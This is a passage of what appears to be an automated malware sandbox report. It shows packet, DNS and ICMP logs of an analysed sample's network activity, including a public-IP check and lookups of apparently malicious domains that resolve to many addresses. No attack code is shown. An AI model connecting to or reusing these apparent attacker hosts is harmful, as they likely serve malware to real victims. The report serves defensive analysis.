                                                        May 4, 2022 16:21:21.428113937 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428116083 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.428122997 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.428136110 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428158045 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428178072 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428189039 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.428195953 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.428200006 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428220987 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428242922 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428263903 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428266048 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.428271055 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.428283930 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428306103 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428328037 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428337097 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.428344011 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.428348064 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428369045 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428390026 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428401947 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.428410053 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.428411007 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428432941 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428453922 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428482056 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.428488970 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.428495884 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428522110 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428524971 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.428546906 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428572893 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.428580999 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.428586006 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.428622007 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.428664923 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.497982025 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498030901 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498331070 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498375893 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498406887 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498437881 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498465061 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498493910 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498522997 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498549938 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498578072 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498605967 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498634100 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498666048 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498692989 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498723030 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498752117 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498780012 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498806953 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498835087 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498862982 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498941898 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498970032 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.498999119 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499027014 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499053955 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499082088 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499109983 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499139071 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499166965 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499195099 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499229908 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499273062 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499301910 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499329090 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499356985 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499402046 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499430895 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499458075 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499485970 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499512911 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499541998 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499578953 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499613047 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499651909 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499687910 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499731064 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499769926 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499797106 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499835968 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499877930 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499912024 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499952078 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.499989033 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500027895 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500066996 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500108957 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500150919 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500194073 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500242949 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500272036 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500299931 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500328064 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500358105 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500391960 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500422955 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500457048 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500510931 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500545979 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500576973 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500607967 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500636101 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500660896 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500685930 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500719070 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500751019 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500778913 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500808001 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500834942 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500863075 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500894070 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500925064 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500956059 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.500983953 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501015902 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501051903 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501082897 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501111031 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501137018 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501167059 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501200914 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501233101 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501255035 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501276970 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501307964 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501329899 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501351118 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501373053 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501394987 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501415968 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501437902 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501458883 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501480103 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501501083 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501522064 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501543045 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501564026 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501585960 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501607895 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501629114 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501651049 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501672983 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501693010 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501715899 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501738071 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501759052 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501780033 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501806974 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501828909 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501849890 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501871109 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501893044 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501915932 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501936913 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501959085 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.501980066 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502002954 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502033949 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502058029 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502079964 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502101898 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502124071 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502146959 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502167940 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502188921 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502209902 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502238989 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502264023 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502285957 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502307892 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.502330065 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.513880968 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516669989 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516696930 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516701937 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516745090 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516783953 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516827106 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516874075 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516920090 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516930103 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.516969919 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.517009974 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.517088890 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.517097950 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.517450094 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.517458916 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.518587112 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.585875988 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.586138964 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.586164951 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.586370945 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.586836100 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.586899996 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.656141043 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656181097 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656213999 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656238079 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656265974 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656280994 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656306982 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656325102 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656349897 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656375885 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656399965 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656424046 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.656445980 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.658230066 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.658262014 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:21.727454901 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.727499008 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.727524042 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.727549076 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.727574110 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:21.732424021 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:22.835144997 CEST4982580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:23.139252901 CEST8049825116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:23.150166988 CEST4982580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:23.154438972 CEST4982580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:23.658023119 CEST8049825116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:24.441509008 CEST8049825116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:24.441524029 CEST8049825116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:24.447551012 CEST4982580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:24.451337099 CEST4982580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:24.755420923 CEST8049825116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:34.761866093 CEST4983680192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:35.078103065 CEST8049836116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:35.078289986 CEST4983680192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:35.078524113 CEST4983680192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:35.080523968 CEST4983680192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:35.397073030 CEST8049836116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:36.648550987 CEST8049836116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:36.648611069 CEST8049836116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:36.648708105 CEST4983680192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:36.648760080 CEST4983680192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:36.771807909 CEST4983680192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:36.999512911 CEST4984580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:37.087958097 CEST8049836116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:37.320596933 CEST8049845116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:37.324688911 CEST4984580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:37.325897932 CEST4984580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:37.850003958 CEST8049845116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:38.620135069 CEST8049845116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:38.620167017 CEST8049845116.121.62.237192.168.2.4
                                                        May 4, 2022 16:21:38.620332956 CEST4984580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:38.678212881 CEST4984580192.168.2.4116.121.62.237
                                                        May 4, 2022 16:21:38.998575926 CEST8049845116.121.62.237192.168.2.4
                                                        May 4, 2022 16:22:26.437941074 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:22:26.439583063 CEST4982380192.168.2.4193.56.146.127

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        May 4, 2022 16:20:28.160969973 CEST6490953192.168.2.48.8.8.8
                                                        May 4, 2022 16:20:28.177081108 CEST53649098.8.8.8192.168.2.4
                                                        May 4, 2022 16:20:28.271305084 CEST6491053192.168.2.4208.67.222.222
                                                        May 4, 2022 16:20:28.287652969 CEST5364910208.67.222.222192.168.2.4
                                                        May 4, 2022 16:20:28.291598082 CEST6491153192.168.2.4208.67.222.222
                                                        May 4, 2022 16:20:28.307825089 CEST5364911208.67.222.222192.168.2.4
                                                        May 4, 2022 16:20:28.500524998 CEST6491253192.168.2.4208.67.222.222
                                                        May 4, 2022 16:20:28.516555071 CEST5364912208.67.222.222192.168.2.4
                                                        May 4, 2022 16:21:22.481286049 CEST5225653192.168.2.48.8.8.8
                                                        May 4, 2022 16:21:22.822657108 CEST53522568.8.8.8192.168.2.4
                                                        May 4, 2022 16:21:34.199577093 CEST5225753192.168.2.48.8.8.8
                                                        May 4, 2022 16:21:34.216151953 CEST53522578.8.8.8192.168.2.4
                                                        May 4, 2022 16:21:34.217381001 CEST5225853192.168.2.48.8.8.8
                                                        May 4, 2022 16:21:34.233515024 CEST53522588.8.8.8192.168.2.4
                                                        May 4, 2022 16:22:22.387646914 CEST6431653192.168.2.48.8.8.8
                                                        May 4, 2022 16:22:23.374944925 CEST6431653192.168.2.48.8.8.8
                                                        May 4, 2022 16:22:24.391297102 CEST6431653192.168.2.48.8.8.8
                                                        May 4, 2022 16:22:26.422003031 CEST6431653192.168.2.48.8.8.8
                                                        May 4, 2022 16:22:27.404277086 CEST53643168.8.8.8192.168.2.4
                                                        May 4, 2022 16:22:28.391235113 CEST53643168.8.8.8192.168.2.4
                                                        May 4, 2022 16:22:29.407274961 CEST53643168.8.8.8192.168.2.4
                                                        May 4, 2022 16:22:31.437788963 CEST53643168.8.8.8192.168.2.4

                                                        ICMP Packets

                                                        TimestampSource IPDest IPChecksumCodeType
                                                        May 4, 2022 16:22:28.391390085 CEST192.168.2.48.8.8.8cff2(Port unreachable)Destination Unreachable
                                                        May 4, 2022 16:22:29.407473087 CEST192.168.2.48.8.8.8cff2(Port unreachable)Destination Unreachable
                                                        May 4, 2022 16:22:31.437877893 CEST192.168.2.48.8.8.8cff2(Port unreachable)Destination Unreachable

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                        May 4, 2022 16:20:28.160969973 CEST192.168.2.48.8.8.80x78a7Standard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                                                        May 4, 2022 16:20:28.271305084 CEST192.168.2.4208.67.222.2220x1Standard query (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                        May 4, 2022 16:20:28.291598082 CEST192.168.2.4208.67.222.2220x2Standard query (0)myip.opendns.comA (IP address)IN (0x0001)
                                                        May 4, 2022 16:20:28.500524998 CEST192.168.2.4208.67.222.2220x3Standard query (0)myip.opendns.com28IN (0x0001)
                                                        May 4, 2022 16:21:22.481286049 CEST192.168.2.48.8.8.80x82a5Standard query (0)cabrioxmdes.atA (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:34.199577093 CEST192.168.2.48.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                        May 4, 2022 16:21:34.217381001 CEST192.168.2.48.8.8.80x2Standard query (0)1.0.0.127.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                        May 4, 2022 16:22:22.387646914 CEST192.168.2.48.8.8.80x5bcdStandard query (0)gamexperts.netA (IP address)IN (0x0001)
                                                        May 4, 2022 16:22:23.374944925 CEST192.168.2.48.8.8.80x5bcdStandard query (0)gamexperts.netA (IP address)IN (0x0001)
                                                        May 4, 2022 16:22:24.391297102 CEST192.168.2.48.8.8.80x5bcdStandard query (0)gamexperts.netA (IP address)IN (0x0001)
                                                        May 4, 2022 16:22:26.422003031 CEST192.168.2.48.8.8.80x5bcdStandard query (0)gamexperts.netA (IP address)IN (0x0001)

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                        May 4, 2022 16:20:28.177081108 CEST8.8.8.8192.168.2.40x78a7No error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                                                        May 4, 2022 16:20:28.287652969 CEST208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                        May 4, 2022 16:20:28.287652969 CEST208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                        May 4, 2022 16:20:28.287652969 CEST208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                        May 4, 2022 16:20:28.307825089 CEST208.67.222.222192.168.2.40x2No error (0)myip.opendns.com102.129.143.40A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.077512026 CEST8.8.8.8192.168.2.40x4708No error (0)l-0007.l-dc-msedge.net13.107.43.16A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at116.121.62.237A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at175.126.109.15A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at37.75.50.246A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at110.14.121.125A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at187.190.48.60A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at148.0.88.95A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at183.78.205.92A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at178.31.115.10A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at187.212.195.33A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:22.822657108 CEST8.8.8.8192.168.2.40x82a5No error (0)cabrioxmdes.at91.139.196.113A (IP address)IN (0x0001)
                                                        May 4, 2022 16:21:34.216151953 CEST8.8.8.8192.168.2.40x1No error (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                        May 4, 2022 16:21:34.233515024 CEST8.8.8.8192.168.2.40x2Name error (3)1.0.0.127.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                        May 4, 2022 16:22:27.404277086 CEST8.8.8.8192.168.2.40x5bcdServer failure (2)gamexperts.netnonenoneA (IP address)IN (0x0001)
                                                        May 4, 2022 16:22:28.391235113 CEST8.8.8.8192.168.2.40x5bcdServer failure (2)gamexperts.netnonenoneA (IP address)IN (0x0001)
                                                        May 4, 2022 16:22:29.407274961 CEST8.8.8.8192.168.2.40x5bcdServer failure (2)gamexperts.netnonenoneA (IP address)IN (0x0001)
                                                        May 4, 2022 16:22:31.437788963 CEST8.8.8.8192.168.2.40x5bcdServer failure (2)gamexperts.netnonenoneA (IP address)IN (0x0001)

                                                        HTTP Request Dependency Graph

                                                        • 185.189.151.28
                                                        • 193.56.146.127
                                                        • cabrioxmdes.at

                                                        HTTP Packets

